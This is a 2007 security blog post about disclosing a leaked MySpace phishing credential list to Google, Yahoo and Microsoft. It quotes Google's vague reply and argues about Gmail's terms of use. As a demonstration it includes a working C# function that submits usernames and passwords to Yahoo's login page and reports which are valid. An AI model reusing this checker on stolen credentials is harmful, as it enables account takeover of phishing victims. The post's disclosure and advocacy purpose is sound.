If at first you don't succeed; call it version 1.0
Friday, 26 January 2007

Almost two weeks after I've sent the first mails, and after sending two more follow-up mails asking if there are any updates regarding this issue, I got only one more response - from Google.
Google's response was somewhat vague:


Hello,
Thanks for your report. We apologize for any inconvenience this may have caused.
When we are notified of such issues, we investigate and take appropriate action if we find that the Gmail Terms of Use have been violated. To read the Gmail Terms of Use, please visit:
http://mail.google.com/gmail/help/terms_of_use.html.
We appreciate your concern, and thank you for taking the time to send us your comments.
Sincerely,
The Google Team


From Gmail’s terms of use:  “…Before you register for your Gmail account, you must read and agree to these Gmail Terms of Use and the following terms and conditions and policies, including any future amendments…”.

I’m not an attorney and I didn’t go to any law school, but from what I can understand from the first line of the terms is that  these “terms of use” are only for Gmail registered users.  So, if an attacker will brute force the MySpace phishing list and will find a valid Gmail username/password and use it, he will not violate these terms because he hasn’t registered to that account and therefore he doesn’t need to read or agree to the terms. I’ve sent this comment to Google.

I'm still waiting for a respond from Yahoo and Microsoft.
Again, to demonstrate how easy it is to extract a valid username/password from the phishers list, the following is a modified version of the Gmail account validator. This time, for Yahoo! Mail:

// Returns 1 if valid username/password, 0 if invalid, -1 if unknown
private static int IsValidYahooMailLogin(string username, string password)
{
   HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create("https://login.yahoo.com/config/login?");
   request.CookieContainer = new CookieContainer();
   request.Method = "POST";
   request.Referer = "https://login.yahoo.com/config/login?";
   request.ContentType = "application/x-www-form-urlencoded";
   string data = ".tries=2&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&" +
".partner=&.u=chn9vfp2qnpl1&.v=0&.challenge=&.yplus=&.emailCode=&pkg=" +
"&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%253d0&login="
+ username + "&passwd=" + password + "&.save=Sign+In";
   request.ContentLength = data.Length;
   StreamWriter reqStream = new StreamWriter(request.GetRequestStream());
   reqStream.Write(data, 0, data.Length);
   reqStream.Close();
   HttpWebResponse response = (HttpWebResponse)request.GetResponse();
   StreamReader sr = new StreamReader(response.GetResponseStream());
   string resp = sr.ReadToEnd();
   sr.Close();
   response.Close();
   return (resp.IndexOf("location.replace") > -1) ? 1 : (resp.IndexOf("Invalid ID or password.") > -1 || resp.IndexOf("This ID is not yet taken.") > -1) ? 0 : -1;
}


Friday, 26 January 2007 15:15:30 UTC | Comments [0] | .NET | Security#
Comments are closed.     
Send me an Email
Follow me on Twitter
RSS Feeds
  
Blogroll
Archive
Admin Login
Sign In
Disclaimer
The opinions expressed herein are my own personal opinions and do not represent my employer's view in anyway.